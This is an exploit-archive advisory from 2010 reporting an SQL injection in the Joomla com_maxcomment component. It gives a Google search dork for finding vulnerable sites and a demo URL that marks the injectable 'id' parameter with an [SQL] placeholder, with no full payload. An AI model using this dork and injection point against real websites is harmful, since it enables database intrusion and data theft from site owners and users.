id: 13495
date: 07/28/2010
title: Joomla Component com_maxcomment Sql Injection Vulnerability
author: SixP4ck3r
cves: 

===========================================================
Joomla Component com_maxcomment Sql Injection Vulnerability
===========================================================


Author : SixP4ck3r
Email & msn : SixP4ck3r@Bolivia.com
Date : 27 July 2010
Critical Lvl : low
Where : From Remote
web : http://foro.nbsecurity.net/
Credits : Diablada and caporal is Bolivian!
Dork : inurl:com_maxcomment

---------------------------------------------------------------------------

[Exploting..Bug..Demo..]

http://example/index.php?option=com_maxcomment&task=quote&id=[SQL]&lang=es&Itemid=1

---------------------------------------------------------------------------

With R3gards,
SixP4ck3r from Bolivia
___eof____



#  0day.today [2023-03-25]  #